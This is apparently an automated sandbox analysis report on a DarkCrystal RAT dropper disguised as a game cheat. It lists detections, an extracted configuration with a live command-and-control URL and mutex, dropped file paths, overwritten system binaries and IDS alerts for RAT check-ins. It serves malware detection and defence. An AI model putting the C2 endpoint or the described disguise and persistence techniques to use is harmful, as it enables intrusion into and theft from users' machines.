                                    Source: C:\Users\user\AppData\Local\Temp\8SIf5KWJtt.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Recovery\services.exeAvira: detection malicious, Label: TR/Spy.Agent.dcvxq
                                    Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeAvira: detection malicious, Label: TR/Spy.Agent.dcvxq
                                    Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeAvira: detection malicious, Label: TR/Spy.Agent.dcvxq
                                    Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeAvira: detection malicious, Label: TR/Spy.Agent.dcvxq
                                    Found malware configuration
                                    Source: 0000000A.00000002.1622516211.0000000013530000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn", "MUTEX": "DCR_MUTEX-CZP27witmtYUEWaffZeU", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeReversingLabs: Detection: 83%
                                    Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\Program Files\Uninstall Information\jnowHpJlZlXal.exeReversingLabs: Detection: 83%
                                    Source: C:\Program Files\Uninstall Information\jnowHpJlZlXal.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\Recovery\jnowHpJlZlXal.exeReversingLabs: Detection: 83%
                                    Source: C:\Recovery\jnowHpJlZlXal.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\Recovery\services.exeReversingLabs: Detection: 83%
                                    Source: C:\Users\user\Desktop\EcfIfcKE.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\MGoyPVal.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\VjwnzPpT.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\VrgGeyQY.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\fSPDjruA.logReversingLabs: Detection: 70%
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeReversingLabs: Detection: 83%
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeReversingLabs: Detection: 83%
                                    Multi AV Scanner detection for submitted file
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeVirustotal: Detection: 56%Perma Link
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeReversingLabs: Detection: 68%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                    Source: C:\Recovery\services.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: 0000000A.00000002.1622516211.0000000013530000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive"}}
                                    Source: 0000000A.00000002.1622516211.0000000013530000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-CZP27witmtYUEWaffZeU","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                    Source: 0000000A.00000002.1622516211.0000000013530000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://77777cm.nyashtyan.in/","externalpipejsprocessAuthapiDbtrackWordpressCdn"]]
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeDirectory created: C:\Program Files\Uninstall Information\jnowHpJlZlXal.exeJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeDirectory created: C:\Program Files\Uninstall Information\7ebef5d49c4292Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeDirectory created: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeDirectory created: C:\Program Files\7-Zip\Lang\7ebef5d49c4292Jump to behavior
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.pdb source: BridgePortsurrogateserverref.exe, 0000000A.00000002.1520293640.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.pdb source: BridgePortsurrogateserverref.exe, 0000000A.00000002.1520293640.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp

                                    Spreading

                                    barindex
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00CFA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CFA69B
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00D0C220
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D1B348 FindFirstFileExA,0_2_00D1B348
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

                                    Software Vulnerabilities

                                    barindex
                                    Suspicious execution chain found
                                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49973 -> 104.21.32.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49977 -> 104.21.32.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49971 -> 104.21.32.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49985 -> 104.21.32.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49988 -> 104.21.32.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49980 -> 104.21.32.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49982 -> 104.21.32.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49805 -> 104.21.32.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49987 -> 104.21.32.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49984 -> 104.21.32.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49989 -> 104.21.32.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49990 -> 104.21.32.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49983 -> 104.21.32.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49981 -> 104.21.32.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49986 -> 104.21.32.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49979 -> 104.21.32.1:80
                                    Source: powershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000026.00000002.1783465174.00000256401EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1753750292.000001D880226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1733402114.000001A6836BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1763302374.0000016F92AF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1691776577.000002BF80827000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1770576287.00000146B2EF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.1705344630.000001B980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1697699277.0000014B290E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1733069605.000001B3C4E46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1735567184.000001EDD77C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.1761913793.000001DCE6DF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1703359712.000001FE80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.1806998001.000001FA1EC88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1757555101.0000024914C98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1729234879.000001E34F558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1770411015.000001E1DB8C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.1770629189.0000016FBB46A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1763311905.000001FFB78F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: BridgePortsurrogateserverref.exe, 0000000A.00000002.1520293640.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1783465174.000002563FE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1753750292.000001D880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1733402114.000001A6833C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1763302374.0000016F928D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1691776577.000002BF80601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1770576287.00000146B2CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.1705344630.000001B980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1697699277.0000014B28EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1733069605.000001B3C4C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1735567184.000001EDD75A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.1761913793.000001DCE6BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1703359712.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.1806998001.000001FA1EA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1757555101.0000024914A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1729234879.000001E34F331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1770411015.000001E1DB6A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.1770629189.0000016FBB1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1763311905.000001FFB76D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000047.00000002.1817958201.00000298B7C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000026.00000002.1783465174.00000256401EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1753750292.000001D880226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1733402114.000001A6836BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1763302374.0000016F92AF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1691776577.000002BF80827000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1770576287.00000146B2EF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.1705344630.000001B980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1697699277.0000014B290E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1733069605.000001B3C4E46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1735567184.000001EDD77C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.1761913793.000001DCE6DF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1703359712.000001FE80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.1806998001.000001FA1EC88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1757555101.0000024914C98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1729234879.000001E34F558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1770411015.000001E1DB8C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.1770629189.0000016FBB46A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1763311905.000001FFB78F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 00000026.00000002.1783465174.000002563FE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1753750292.000001D880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1733402114.000001A6833C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1763302374.0000016F928D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1691776577.000002BF80601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1770576287.00000146B2CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.1705344630.000001B980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1697699277.0000014B28EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1733069605.000001B3C4C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1735567184.000001EDD75A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.1761913793.000001DCE6BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1703359712.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.1806998001.000001FA1EA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1757555101.0000024914A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1729234879.000001E34F331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1770411015.000001E1DB6A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.1770629189.0000016FBB1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1763311905.000001FFB76D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000047.00000002.1817958201.00000298B7C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: powershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00CF6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00CF6FAA
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00CF848E0_2_00CF848E
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00CF40FE0_2_00CF40FE
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D040880_2_00D04088
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D000B70_2_00D000B7
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D151C90_2_00D151C9
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D071530_2_00D07153
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D062CA0_2_00D062CA
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00CF32F70_2_00CF32F7
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D043BF0_2_00D043BF
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D1D4400_2_00D1D440
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00CFF4610_2_00CFF461
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00CFC4260_2_00CFC426
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D077EF0_2_00D077EF
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D1D8EE0_2_00D1D8EE
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00CF286B0_2_00CF286B
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D219F40_2_00D219F4
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00CFE9B70_2_00CFE9B7
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D06CDC0_2_00D06CDC
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D03E0B0_2_00D03E0B
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00CFEFE20_2_00CFEFE2
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D14F9A0_2_00D14F9A
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeCode function: 10_2_00007FFAAC580D4810_2_00007FFAAC580D48
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeCode function: 10_2_00007FFAAC580E4310_2_00007FFAAC580E43
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: String function: 00D0EC50 appears 56 times
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: String function: 00D0F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: String function: 00D0EB78 appears 39 times
                                    Source: vyXTwjuX.log.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: VrgGeyQY.log.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: fSPDjruA.log.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: VjwnzPpT.log.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: MGoyPVal.log.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: EcfIfcKE.log.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: BridgePortsurrogateserverref.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: services.exe.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: jnowHpJlZlXal.exe.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: jnowHpJlZlXal.exe0.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: jnowHpJlZlXal.exe1.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: jnowHpJlZlXal.exe2.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@90/113@0/0
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00CF6C74 GetLastError,FormatMessageW,0_2_00CF6C74
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00D0A6C2
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Program Files\Uninstall Information\jnowHpJlZlXal.exeJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeFile created: C:\Users\user\Desktop\VrgGeyQY.logJump to behavior
                                    Source: C:\Recovery\services.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8316:120:WilError_03
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-CZP27witmtYUEWaffZeU
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_03
